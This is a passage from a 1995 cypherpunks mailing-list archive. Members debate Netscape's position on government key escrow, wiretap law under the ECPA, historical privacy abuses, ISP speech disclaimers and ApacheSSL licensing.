http://www.c2.org/ (or login as "guest") sameer at c2.org From sameer at c2.org Sun Dec 3 01:34:12 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 1995 17:34:12 +0800 Subject: Why Netscape employees should not leave... In-Reply-To: <30C162DD.1E2F@netscape.com> Message-ID: <199512030920.BAA11667@infinity.c2.org> > Can't I be a supporter of strong crypto, and also be in it for the money? > Many people here make good money off of crypto related work. If I'm asked > to implement GAK in a situation where it is not mandated by law, I won't > do it. Yes. You don't have to work at Netscape to make money doing crypto. Witness the various crypto-related startups who do not support key escrow. Comsec partners, electric communities, community connexion, etc. (Not that you can't be a supporter of strong crypto and work for netscape at the same time. The jury [in my mind] is still out on that one) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From bdavis at thepoint.net Sun Dec 3 17:34:36 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 3 Dec 95 17:34:36 PST Subject: Netscape gives in to key escrow In-Reply-To: <199512011629.KAA28071@galil.austnsc.tandem.com> Message-ID: On Fri, 1 Dec 1995, Sten Drescher wrote: > Matt Miszewski said: > > MM> On Thu, 30 Nov 1995, sameer wrote: > > s> Jeff: If Netscape comes out in favor of GAK, will you leave? (Wait > s> until February, at least, of course..) You don't have to answer that > s> to me, or the list, just think about it, and answer it for yourself. > s> Do you think "anyone else" there would leave, as you say below that > s> they don't want to go down history, etc... > > MM> While this would go over well in the press if handled right please > MM> let everyone remember that Jeff is a real person with bills to pay > MM> and food to put on at least his own table. > > I believe that was the point: How many people at Netscape would > put principled opposition to GAK ahead of expediency? My guess? Not > enough. I feel slighted. No one accused me of lacking principles because I haven't quit my job with the Justice Department based on its, and the Administration's, position. Then again, maybe you just realize that the market for lawyers, and the market for people who can actually do something worthwhile, is very different. Nevertheless, I won't think less of Jeff if he doesn't quit. He appears to be fighting what most here believe is the good fight. Refusing to take his ball and go home does not mean, to me, that he lacks principles. Perhaps it means that he thinks he can do more from within. Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled his Usenet access because of his protected speech and then gave it back only if he included a disclaimer on his messages. Fire away, Cypherpunks!!! EBD From bdavis at thepoint.net Sun Dec 3 17:53:27 1995 From: bdavis at thepoint.net (Brian Davis) Date: Sun, 3 Dec 95 17:53:27 PST Subject: "Got a subpoena?" In-Reply-To: Message-ID: On Sat, 2 Dec 1995, jim bell wrote: > >On Thu, 30 Nov 1995, sameer wrote: > > > >> > > >> > What about a court order to (a) start comprehensive logging, and (b) not > >> > tell anyone under penalty of ______ . > > > >I am unaware of any authority for such an order. > >> > >> Aren't court orders part of the public record? I don't quite > > > >Yes, but court orders can be sealed pending further order of the court. > > Okay, maybe with your qualifications you can answer this. It has always > mystified me why "the authorities" think they can engage in wiretapping > without informing the person wiretapped that this has occurred, despite the > fact that there was apparently never any precedent for this practice before > the "wiretap era." Because Congress passed the Electronic Communications Privacy Act which is codified, as amended, at 18 U.S.C. Section 2510 et seq. Section 2511(2)(a)(ii) states in part: "Notwithstanding any other law, providers of wire or electronic communication service ... are authorized to provide information, facilities, or technical assistance to persons authorized by law to intercept wire, oral, or electronic communications ... if such provider ... has been provided with [a court order or a certification by an appropriate official that a court order isn't required ...]. > > In addition, I would like to be able to figure out a method to allow the > de-facto disclosure of such activities, and to in fact force the phone > company to do so, if they are asked to tap my or anyone else's phone. It > occurred to me that even if there was a prohibition on explicitly revealing > that such a tap exists, it should be possible to require the telephone > company to certify that no tap exists, and to require that this > certification will be followed by an explicit and immediate de-certification > message the moment the phone company is unable to maintain such > certification. The receipt of such a letter/fax/email will indicate that a > tap has been placed, despite the fact that it will not say so. Sorry. In subsection B of the the statute I quoted above, it states in part: "No provider of wire or electronic communication service ... shall disclose the existence of any interception ... with respect to which the person has been furnished a court order or certification ... except as may be otherwise required by legal process and then only after prior notification to the Attorney General or .... Any such disclosure shall render such person liable for the civil damages provided for in section 2520. No cause of action shall lie against in any court against any provider ... for providing information ... in accordance with the terms of a court order or certification under this chapter." Thus providing evidence of that one of the uses of lawyers is to [attempt to close loopholes. EBD > > >EBD > > > >Not a lawyer on the Net, although I play one in real life. > > > > Not a lawyer on the Net, although I play one in real life. ********************************************************** Flame away! I get treated worse in person every day!! From futplex at pseudonym.com Sun Dec 3 01:54:01 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 3 Dec 1995 17:54:01 +0800 Subject: French crypto restrictions - update ? In-Reply-To: <199512020701.XAA01919@ammodump.mcom.com> Message-ID: <199512030829.DAA17614@thor.cs.umass.edu> Sorry, this has nothing to do with Netscape's position on GAK: Jim Clark writes (via Jeff Weinstein): > Until recently, France did not even > allow us to sell products with 40-bit keys, much less 128-bit keys. I'm curious about this. Were Chirac et compagnie simply dragging their feet on granting a license, have they made an actual policy change, or did they realize they could do what Damien did ? It would be interesting to see more information on this development. (There's a paranoid conspiracy theory I could add to the pile here, but I don't believe it and we seem to be knee-deep in them at the moment....) -Futplex Let's wait and see From edge at got.net Sun Dec 3 17:55:30 1995 From: edge at got.net (Jay Campbell) Date: Sun, 3 Dec 95 17:55:30 PST Subject: Netscape gives in to key escrow Message-ID: <199512040320.TAA29525@you.got.net> >Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled >his Usenet access because of his protected speech and then gave it back >only if he included a disclaimer on his messages. Fire away, Cypherpunks!!! Get your facts straight before spewing this nonsense to the masses. There's not an ounce of reality reflected anywhere in that whole sentence. -- Jay Campbell edge at got.net - Operations Manager -=-=-=-=-=-=- Sense Networking, Santa Cruz Node Jay at Campbell.net got.net? PGP MIT KeyID 0xACAE1A89 "On the Information Superhighway, I'm the guy behind you in this morning's traffic jam leaning on his horn." From stewarts at ix.netcom.com Sun Dec 3 18:07:08 1995 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 3 Dec 95 18:07:08 PST Subject: Globally legal Netscape Message-ID: <199512040209.SAA03343@ix12.ix.netcom.com> Fred Cohen wrote: > Law enforcement is almost universally used as an excuse to > collect information on individuals in the name of helping society, > but this power is easily abused. In addition to Fred's good examples of abuse of information, I'd like to add the use of census data to arrest Japanese-Americans during World War 2 - not only was the data collected under great promises that citizens could trust the government, and that it would only be accessible for lawful purposes, it was used to attack people who weren't doing anything illegal or wrong when it was collected. Everything you say on the nets sticks around, and if the government has master keys, then even what you said in private sticks around. It's not illegal to say "[expletive deleted]" in private mail today, and won't be even after Exon-II passes, but it _may_ be kept around so they'll know whose mail to get law enforcement access to to enforce the Verbal Morality Act of 2001. At 04:26 PM 12/3/95 -0600, rthomas at pamd.cig.mot.com (Robert Owen Thomas) wrote: >look, this is just a *bit* extreme. having been one of those folks sworn >to uphold the Constitution, I can tell all of you that there is no master >plan to rid the American people of their rights and freedom. Remember the fundamental job of any bureaucracy - self-preservation and growth, by whatever means necessary. No need for any master plan or conspiracy. Are there herds of opportunists interested in taking political advantage of anything that comes their way? You bet. Listen to Louis Freeh talk about the need to be able to eavesdrop on anybody they want to be able to catch narco-terrorist child pornographers, and think about whether you want the FBI able to tap your email - especially if you occasionally send email to people whose chronological age you don't know using language that Senator Exon might disapprove of. Reminds me a lot of Harry Anslinger talking state governments into banning Evil Marihuana in the waning days of Prohibition. >o Robert Owen Thomas: Corvette pilot. Cymro ydw i. User scratching post. o ^^^^^^^^^^^ Between the anti-encryption cops and the English-Only right-wingers, you may not be able to say that much longer - Welsh isn't quite as heavily encrypted as, say, Navajo, but it's bound to violate some law soon enough :-) #-- # Thanks; Bill # Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281 # Anybody notice that Microsoft's Wide Open Road ad has barbed-wire fences # on both sides of the road? From dlv at bwalk.dm.com Sun Dec 3 18:09:30 1995 From: dlv at bwalk.dm.com (Dr. Dimitri Vulis) Date: Sun, 3 Dec 95 18:09:30 PST Subject: Globally legal Netscape In-Reply-To: <9512032146.AA07279@all.net> Message-ID: fc at all.net (Dr. Frederick B. Cohen) writes: > - The Russian revolution resulted in purges killing hundreds of > thousands of innocent people because of their private, turned > public, views as expoused in their private writings. Correction: tens of millions were killed (including my great-grandfather). > - The Soviet government took away personal privacy to keep their > stranglehold on their people. It's interesting to note that the democratic Russian government banned all unlicenced cryptography this year. (I posted the translation of Yeltsin's decreee to this list). ... > - The Germans under Hitler used personal records to identify and > murder millions of Jews and other peoples. One conspiciously absent example: the Roosevelt administration used the census data (supposedly confidential) to ferret out persons of Japanese descent, who were then sent to concentration camps. --- Dr. Dimitri Vulis Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From fc at all.net Sun Dec 3 18:27:24 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Sun, 3 Dec 95 18:27:24 PST Subject: more examples of privacy invasion as a prelude to oppresion desired Message-ID: <9512040224.AA11723@all.net> I think it would be a very good idea to collect a great deal more data in support of the correlation between the reduction in privacy and the removal of other rights - eventually resulting in bad things - throughout history. I would be happy to collect as much data as possible on this from the cypherpunks (and others) and to post the information in a more complete form when the examples start to slow down. The more facts and citations you can provide, the better it will be for the purposes of making this point clear, accurate, and hard to dispute. -> See: Info-Sec Heaven at URL http://all.net/ Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From pfarrell at netcom.com Sun Dec 3 18:28:27 1995 From: pfarrell at netcom.com (Pat Farrell) Date: Sun, 3 Dec 95 18:28:27 PST Subject: Do the Right Thing Message-ID: <77313.pfarrell@netcom.com> TCMay writes to c'punks: > Well, people discuss what they think is important. Those who don't think > this topic is important are of course not compelled to participate in the > debate. True. Although calling it a debate is being loose with terms. Rant is more accurate. > These two points are what many of us are concerned about. Some may argue > "Wait until it's illegal, then protest," but I think the Cypherpunks list > has shown a particular strength in spotting "early warning signals" well > in advance of actual developments, thus enabling us to get our ducks in > line and hit the ground running (to mix some metaphors). Hey, I was a fan of Trial Balloon... But lets react to reality, not net-rumours. Nothing to date has indicated that domestic GAK will be manditory, except, as I noted in the last post, DERD, Freeh, and Grevildinger [sp] We are failing to get our message accross to the Joe Sixpack's of the world. We are starting to get get some coverage in the press (USA Today, NY Times, etc.) but this is a slow education effort. Preaching to the choir is pretty pointless. >>It was quite clearly implied at the September meetings that the >> Government expected that vendors would do only one version, GAK'd. >> This would allow the LEAs to tromple all over US civil liberties >> at will. > This was my point about having a domestic and an export version. Don't we agree on this? "tromping" on civil liberties sucks. That is what I wrote last message. > Pat, if the policies and technologies surrounding key escrow are not > relevant to the themes of the Cypherpunks list, I surely don't know what > is! The policies and technologies are relevant. hacks to disable Netscape because people are too lazy to see that they are already doing multiple version, or that others provide browsers, is noise. IMHO. If we want to find about the policies, and given that there is a huge, public meeting in two days, can't we wait to get some facts? > People talk about what matters to them, for the most part, and attempts to > "steer" the list to other topics are best done by example. That is, write > up a really interesting article on some "relevant" topic and perhaps > people will discuss it. That seems better than saying a discussion of GAK > is not relevant. I have not said any such thing. I have attemped to write up actual, factual recordings of GAK at NIST. What I am saying is that bitching about Netscape is a waste of list bandwidth. If you think Netscape is full of fascists, use another browser. Or, heaven forbid, write code. > And the NIST/NSA meeting is coming up in a few days...what better time to > discuss some issues, and thus possibly trigger some ideas or arguments for > attendees to make, than now? What's the point of waiting until it's over, > when all we can do then is complain? What news is there on this topic? I am a privacy guy. GAK sucks. So what is news? Is it news that the Crypto-guys think GAK sucks? As TCMay has written, check the archives. Lets not cover already covered ground. Come on, lets either talk about news, action (Ian's, RJC's, Daimen's, ... hacks) or what we can really do to be effective. My point, which I clearly failed to make, was that Netscape has to date, done a pretty good job. The quotes from Jim Clark indicate that his is clueless. Fine, use another browser. > I think key escrow, whether of the Clipper variety of the SKE variety, is > central to the themes of the group. Netscape bombs are not relevant to what I think is the charter of Cypherpunks. Pat Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell Info. Systems & Software Engineering, George Mason University, Fairfax, VA PGP key available on homepage #include From tcmay at got.net Sun Dec 3 18:30:23 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 95 18:30:23 PST Subject: Evil Prosecutors on the List Message-ID: At 1:30 AM 12/4/95, Brian Davis wrote: >I feel slighted. No one accused me of lacking principles because I >haven't quit my job with the Justice Department based on its, and the >Administration's, position. Speaking for myself, I simply assumed you were a prosecutor handling the "legitimate" cases, as the OJ prosecutors were (granted, different types of cases). Despite my libertarian leanings, I suppose many or even most prosecutions actually involve real crimes of fraud, theft, embezzlement, etc., at least based on what I read of pending court cases. Though there are probably a lot of "crimes" prosecuted that I don't think of as real crimes. A college friend of mine is married to a woman who's a prosecutor in Brooklyn, and one of her cases involved prosecuting some poor shlub who was caught committing the dastardly crime of _smuggling his own money_ out of the country! (Tens of thousands of dollars, not the millions that a drug case would involve, not that it matters to me, but it might to some.) My point? I did not insult her when she mentioned this, just said something like "Well, I don't view it as a crime." She of course understood, as her husband is a libertarian like me. (I could never be a prosecutor, or even a successful defense attorney, as I would feel it necessary to decide on each case whether prosecution/defense is justified.) I suppose I don't impute evil to very many people at all. I view some _institutions_ as counterproductive and at odds with the principles of free association and non-agression that this country was founded on, and it is the _institutions_ I think need changing. Fortunately, strong crypto is the right kind of tool at the right time. (I think my hero Tom Jefferson would really have gotten a kick out of this stuff, especially considering that he invented his own ciphers for private communication....not a lot of doubt what he'd have thought about a scheme for the government to have access to all business transactions, all conference calls, all private e-mail, and all international letters.) But I don't think of Dorothy Denning, for example, as an "evil" person, just as someone whose assessment of the tradeoffs, and whose political power of course (she having the ear of the leadership), is much different from mine. And I've met Stewart Baker, former chief counsel of the NSA (and past/present advocate of restrictions on strong crypto use), and he's quite knowledgeable and reasonable. (I hope readers will spare us the usual responses along the lines of "They say Hitler was very charming." Monsters can indeed be deceptively charming, but I don't think for a nanosecond that Stewart Baker, Louis Freeh, Dorothy Denning, or Jim Clark fit into this picture. My point is that reasonable people can have disagreements, even disagreements which they cannot compromise about, without any requirement that one or the other be "evil.") Getting back to Baker, it is clear we disagree. He may even think me irresponsible for advocating "anarcho-capitalist" views (*), but we were able to communicate civilly at the last CFP and even shared a panel. I think he understands my libertarian positions, and I think I understand his concerns. As it happens, I'm just not convinced that stopping some number of crimes is sufficient reward for outlawing privacy. Mounting cameras in all homes and hotel rooms would undeniably stop some number of crimes, or allow the perps to be caught and convicted, but it is too high a price to pay by orders of magnitude. (* I call my position "crypto anarchy," for reasons I've explained, but it is actually the fairly well-respected position of laissez-fair capitalism, aka anarcho-capitalism, aka freedom. Since it is instantiated on the Net, perhaps a better name would be "arachno-capitalism," not to be confused with the "narco-capitalism" practiced, it is said, by the CIA and various dictators.) >Nevertheless, I won't think less of Jeff if he doesn't quit. He appears >to be fighting what most here believe is the good fight. Refusing to >take his ball and go home does not mean, to me, that he lacks >principles. Perhaps it means that he thinks he can do more from within. > >Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled >his Usenet access because of his protected speech and then gave it back >only if he included a disclaimer on his messages. Fire away, Cypherpunks!!! Indeed, we all make compromises. The calls for Jeff to quit Netscape are especially pointless, I think. First, he can do more for "our" cause than if he quits and his voice is no longer heard. Second, it's far too early to know how things are going and whether Netscape will in fact become the "munitions supplier" to the Surveillance State. Third, the element of hypocrisy. I didn't see a single one of our AT&T list members resign from AT&T over the Clipper flap. This is why I'm concerned about the Netscape position, and why I'm probing for details and explanations, but it is also why I'm trying the best I can not to be rude or insulting to Jeff Weinstein. If we drive him off the list with insults and cheap shots, it is quite possible that our views will no longer have any impact within Netscape (or other companies, for that matter) and that we'll just be dismissed as a bunch of crazies. Your mileage may vary. --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From jsw at netscape.com Sun Dec 3 02:31:42 1995 From: jsw at netscape.com (Jeff Weinstein) Date: Sun, 3 Dec 1995 18:31:42 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! In-Reply-To: <30C0EE0D.48A9@netscape.com> Message-ID: <30C178F1.1DC3@netscape.com> Black Unicorn wrote: > > On Sat, 2 Dec 1995, Jeff Weinstein wrote: > > > Black Unicorn wrote: > > > > AT&T seems to have been suitably 'incentivized' > > > The receipt of government funding (in whatever guise) might be just as > > > powerful in this case. > > > > > > To the outsider, it looks as if Netscape 'owes' the government. > > > > We do owe the government. They have paid us for Servers and Clients > > that support Fortezza. That is what we owe them. The money that the > > NSA gave us for Fortezza is not very significant compared to what we > > are getting from commercial sources. > > Obviously it was significant enough to take. It was also a perfect > opportunity for Netscape to express concerns about the future of the > technology, which is in netscape's interest. The astute deal maker would > be happy to work with the NSA on his own terms. Instead, it > would appear that Netscape is working FOR NSA on their terms. I wasn't aware that you were privy to the details of the contract. > > > > We are actively lobbying in washington to get clarification of the > > > > current regulations so that we can provide the US version via an "export > > > > controlled" FTP or HTTP download. > > > > > > With which firm? Or have you made it an in-house effort? > > > > We have recently hired a government liason person to manage our policy > > discussions with the government. He is one of the people that will be > > talking to congressional and white house representatives next week. > > I don't know if we have made use of any outside lobbying firms. > > I'd be interested to know what a 'government liason person' is. It > sounds to me like an 'in house lobbist.' There is an old joke in the > beltway about in house lobbists. > > I also would like to know why you are actively lobbying for > 'claification' rather than 'modification' of the current policy. We are asking for both. We want to know what we have to do to make our US version available for FTP download to everyone who is legally allowed to use it, without violating the current law. We also want the export restrictions removed so that we can ship the same stuff to other countries. The former is a short term goal while the latter will likely turn into a longer term effort. > Netscape seems to be taking the position, "We'd love it if you'd let us > do X, but we are happy to roll over for whatever." So you consider not breaking the law to be "rolling over"? You have the luxury of hiding behind anonymity. We don't. > and "By the way, > what is the rule on exporting software again?" Doesn't everyone want to know this? Do you think that the ITAR is clear about the meaning of "export" in the case of FTP and the internet? > I am impressed that some effort is being made. I think it in the form of > 'too little, too late.' But hey, who am I? Four months ago we did not have lots of money in the bank. People seem to forget that this still a young and small company. Perhaps the current valuation is blinding obscuring this. Now that we have more resources at our disposal hopefully we can help make a difference. --Jeff -- Jeff Weinstein - Electronic Munitions Specialist Netscape Communication Corporation jsw at netscape.com - http://home.netscape.com/people/jsw Any opinions expressed above are mine. From nobody at REPLAY.COM Sun Dec 3 18:34:36 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 18:34:36 PST Subject: info? Message-ID: <199512040235.DAA29635@utopia.hacktic.nl> On 3 Dec 95 at 22:28, j.miranda3 at genie.com wrote: > Can you send me information about your organization? > > --Joseph Miranda Sure, Joe! We were founded several thousand years ago, have had chapters in virtually all societies and cultures beyond the truly primitive ones. Some of our members founded the United States of America some time back -- maybe you've heard of it? We have initiation rites that often involve learning arcane and complex formulae from thick books, we have secret handshakes, decoder rings, and we often like to roast our victims over a slow fire. There's hardly anything that goes on in the world that our members don't affect, and still, the society at large doesn't really know we're here. If you're looking for a secret cabal well, gee, you've come to the right place! If you'd like an interesting and colorful brochure containing all the details and benefits of membership, just pick up the phone, call your mother, and ask for one! Thank you for inquiring about the International Gourmet Cooking Society! Salsa Sam From nobody at REPLAY.COM Sun Dec 3 18:39:24 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 3 Dec 95 18:39:24 PST Subject: Jim Clark, "Mr. Bubble" Message-ID: <199512040239.DAA29711@utopia.hacktic.nl> -----BEGIN PGP SIGNED MESSAGE----- Dan Weinstein: >You have just proven your self to be a hypocrite. If you expect of >others more than you expect of your self, you need to reevaluate your >own life. If you are not willing to risk your life, fortune, and >reputation on your beliefs, how can you expect Mr. Clark or anyone >else to do the same. And you've just proven yourself to be "a little bit slow"; hypocrites, at least, can change their ways. This discussion is about the effects that Jim Clark, someone who is assessed as a billionaire and who heads a Wall St.-bedazzling multibillion-dollar corporation, can have on USG crypto policy; yet you would get into a tawdry comparison of "personal failings." I will continue not to trumpet the specifics of any crypto-promoting illegalities which I may or may not have engaged in, and I'll thank you to do the same. Hieronymous >"I understand by 'freedom of Spirit' something quite definite - >the unconditional will to say No, where it is dangerous to say >No. > Friedrich Nietzsche BU was right: there's gotta be a self-help book called something like "Learning to Say YES!" that would provide you with a more appropriate .sig. -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBVAwUBMMJeX73g0mNE55u1AQEiqAH+IXva02/4rIoegkaQEUzF9X/2nTQhGKFm TEO6RjrN1vuegeUtBs3oNfvs4bq6Rxrnras+9EJfVCaxZam51dWDRQ== =pRWz -----END PGP SIGNATURE----- From gnu at toad.com Sun Dec 3 18:56:37 1995 From: gnu at toad.com (John Gilmore) Date: Sun, 3 Dec 95 18:56:37 PST Subject: Java Cup International -- $1,000,000 in prizes Message-ID: <9512040256.AA14558@toad.com> [Wouldn't it be fun to win an UltraSPARC for writing some free code to secure Java applications? The catch is: No entries can use encryption! I wonder how they expect electronic commerce, security, or micropayment systems without encryption. See the Official Rules. -- John] Sun Microsystems has announced the JAVA Cup International, a contest to promote the creation and public availability of small, platform-independent applications called JAVA applets. Software developers will compete to develop the most innovative and creative applets. The JAVA Cup International contest begins immediately and ends March 31, 1996. Who's Eligible: Developer community including business, academic, and individual programmers worldwide. Prizes: Prizes will total $1,000,000 in Sun equipment (U.S. list) distributed among winners. One grand prize and three prizes per category (two individual prizes and one team prize). The first 1,000 to submit entries will receive a Java Coffee Cup & T-Shirt. Categories: Productivity Tools, Internet/Web Agents, Educational, Developer Tools, Entertainment and Games, Unlimited. Judging Criteria: Best Graphics, System Friendliness, Clean Code, Security, Reliability, Interactivity, Innovation. Check out http://javacontest.sun.com for complete details. From jamesd at echeque.com Sun Dec 3 03:01:01 1995 From: jamesd at echeque.com (James A. Donald) Date: Sun, 3 Dec 1995 19:01:01 +0800 Subject: Info on Netscape's key escrow position Message-ID: <199512021603.IAA00950@blob.best.net> At 11:01 PM 12/1/95 -0800, Jeff Weinstein wrote: > > I think the gist > of it is that if governments require key escrow, we will have to do it > in order to sell our products with encryption into those countries. Jim Clark wrote: >> But if we do not come up with a solution to this problem that is >> acceptable to each government, we will not be able to export our products, >> except with a short key length (e.g. 40 bit keys), and that will not be >> acceptable to corporate customers in other countries. I read it as saying: "Let us help the government invade the privacy of our customers, so that the government will do us some favors in export licensing", rather than "Well if they stick it to us at gunpoint, we will submit." I would appreciate some further "clarification". --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From carolann at censored.org Sun Dec 3 03:02:35 1995 From: carolann at censored.org (Censored Girls Anonymous) Date: Sun, 3 Dec 1995 19:02:35 +0800 Subject: GAK Flap Happening at a Good Time--Journalists Read! Message-ID: <199512031053.DAA24346@mailhost1.primenet.com> I have been to Congress. I have lobbied them personally. Oct 2nd & 3rd was when. It wasn't easy. I also spent time in the Press Galleries. That was even harder. I will be there next October, and will be credentialed for all four of the different galleries. Mr. Jeff get real. You company is now on the record for GAK. It hadn't until then. But now you are. Now all the lower levels can decry what Mr. Clark said, but the damage is already done. And....if you're not, Mr. Jeff, this being the electronic age and all, why not get Mr. Clark to clarify it, muddy it, or downright repudiate it as a misquote or something. I'd love to see that. So would a lot of others. But somehow I don't think that is gonna happen. Love Always, Carol Anne ps censored.org is now running ftp at 206.42.112.96 on an intermittent basis using serveu1.1 >Black Unicorn wrote: >> >> On Sat, 2 Dec 1995, Jeff Weinstein wrote: -- Member Internet Society - Certified BETSI Programmer - Webmistress *********************************************************************** Carol Anne Braddock (cab8) carolann at censored.org 206.42.112.96 My Homepage The Cyberdoc *********************************************************************** ------------------ PGP.ZIP Part [017/713] ------------------- M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M MF=O0H+*%(-S%&>S%+FS& http://dcs.ex.ac.uk/~aba/export/ From jhupp at novellnet.gensys.com Sun Dec 3 19:03:43 1995 From: jhupp at novellnet.gensys.com (Jeff Hupp) Date: Sun, 3 Dec 95 19:03:43 PST Subject: Apachessl (was your mail) Message-ID: <2B69E5170C1@Novellnet.Gensys.com> On 3 Dec 95 at 11:41, Laszlo Vecsey wrote: : > > Competing with Netscape is obviously something that's easier said than : > > done. But we ought to consider the strategic importance of having robust, : > : > I hate to repeat myself, but sometimes people don't listen. : > http://www.c2.org/apachessl/ : : I don't see how you can charge for a commercial versions of ApacheSSL. : Isn't it protected by the GNU license agreement? Or is the idea that by : registering ApacheSSL you still get the software for free but you are : required to pay for support. Go read the GNU license. Nothing prevents selling the programs, nothing prevents selling modifications of the programs. The major restraint is that you have to provide source. Now, from what I read of the page, that is being done. Personally, I would prefer to see the whole thing given away, and if I had done it, it would be. But he (or his contractors / employees ) did the work that went into modifying it, and if he want's to sell that work he bloody well can. -- JHupp at gensys.com |For PGP Public Key: http://gensys.com |finger jhupp at gensys.com Does history recorde any case in which the majority was right? From froomkin at law.miami.edu Sun Dec 3 19:14:02 1995 From: froomkin at law.miami.edu (Michael Froomkin) Date: Sun, 3 Dec 95 19:14:02 PST Subject: Do the Right Thing In-Reply-To: Message-ID: On Sun, 3 Dec 1995, Timothy C. May wrote: [....] > Is it too early to worry about outlawing of non-GAKked crypto? Hal Abelson > has this in the preliminary program for CFP '96, sent out today: > > "Events planned for this year's conference include: > > - Federalprosecutors square off against civil-liberties lawyers > in a Supreme Court test of the "Cryptography Control Act of > 1996", which criminalizes non-escrowed encryption." [.....] Tim knows this, but before some other careless reader sets off a panic, I want to make it clear to that this is a MOOT court, in which participants will PRETEND to test the validity of a HYPOTHETICAL act. A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's warm here. From tcmay at got.net Sun Dec 3 19:20:55 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 3 Dec 95 19:20:55 PST Subject: .SIG disclaimer, clarification Message-ID: At 3:55 AM 12/4/95, Timothy C. May wrote: >At 1:30 AM 12/4/95, Brian Davis wrote: >>Gee, and Tim May didn't get a new ISP when his current PC-ISP canceled >>his Usenet access because of his protected speech and then gave it back >>only if he included a disclaimer on his messages. Fire away, Cypherpunks!!! > >Indeed, we all make compromises. >From Jay Campbell's post on this, I more carefully reread Brian's comment. Without going into this in detail, which there is not enough time or patience for anyone to read, I'll make a few clarifications. 1. I have not gotten a new ISP anytime recently. 2. I added a disclaimer to my .sig partly to lessen any future misunderstandings about whether I was speaking for "tcmay at foobar.com" or speaking for "foobar.com". And partly I added it--as should be clear from "or the views of my government" part--as an ironic tweak. 3. The case involved a Usenet rant I wrote some time back in which my "Organization:" field remained set at the default provided by the ISP (complete with phone number for getting an account, as is common with Netcom, AOL, Pipeline, etc.). People complained to the owner of "foobar.com" claiming that his company could be sued, blah blah, for the views I expressed. (I think this is absurd, of course, for so many reasons I cannot begin to list them here.) (I don't believe the nature of my rant is germane to the issues involved. It was posted to a group filled with similar, or worse, rants, and was not inappropriate to the subject of the newsgroup. And explaining the post in context, including preceeding and following posts, and other posts circulating at the same time, would take far too much time while accomplishing nothing productive. Was it extreme? Maybe. Events had pissed me off, so I posted to a rant group. Unfortunately, some on the Usenet want only their own rants heard.) 4. The owner of foobar.com abruptly turned-off my ability to access his news machine and sent me an angry note demanding that I cancel my article, post an apology, and make it clear in future posts that I was not with his company (by changing the default Organization: field he had automatically set!). He informed me that failure to promptly indicate my acceptance of his conditions would result in my account being cancelled. 5. Being that I like the services at foobar.com, and being that it was a minor matter to meet his conditions, I did so. My access to Usenet was turned back on. This is what I meant by my statement "we all make compromises." 6. I am very happy with "got.net," and Jay Campbell, one of the sysops of got.net, was not the person involved above. 7. This issue presumably came to Brian's attention through the Cyberia list, where someone (Chris Mohr) had commented on .sig disclaimers in general and mine in particular. So I outlined the story, in even less detail than I have here, as an interesting data point on how pressure can be applied to stifle unpopular opinions. (Understand that I am opposed to any laws which would force a sysop to keep a customer he no longer wishes to have. My point is more sociological. In particular, if a service or ISP gets the "reputation" for cancelling accounts because of pressures applied, then those who want certain views suppressed will know they can "roll" the ISP. Netcom, to their credit, understood this early on and adopted a policy of never cancelling accounts for the content of things said (spamming, fraud, chain letters, etc. being well-described exceptions in their "Terms and Conditions") Netcom has several "despicable" posters who use the system to spread Jew-hating, white-hating, gay-hating, men-hating, and other such *-hating views, and even has Holocaust Deniers and the White Aryan Resistance as account-holders. Netcom refuses to give in to those who want these accounts cancelled. A lesson for all ISPs, and for remailers, too.) --Tim May Views here are not the views of my Internet Service Provider or Government. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From sameer at c2.org Sun Dec 3 19:26:27 1995 From: sameer at c2.org (sameer) Date: Sun, 3 Dec 95 19:26:27 PST Subject: Apachessl (was your mail) In-Reply-To: <2B69E5170C1@Novellnet.Gensys.com> Message-ID: <199512040321.TAA23272@infinity.c2.org> > Personally, I would prefer to see the whole thing given away, and if I > had done it, it would be. But he (or his contractors / employees ) did > the work that went into modifying it, and if he want's to sell that > work he bloody well can. Hell, *I'd* prefer to see the whole thing given away. Ain't gonna happen though. It's called US patent law. (I would have put *much* less work into it, if it was going to be given away, though, so the fact that people have to pay for it actually results in a better non-commercial version as well. [the only thing you don't get with the non-commercial version is commercial use licensing for the patent stuff and support..]) Maybe though, 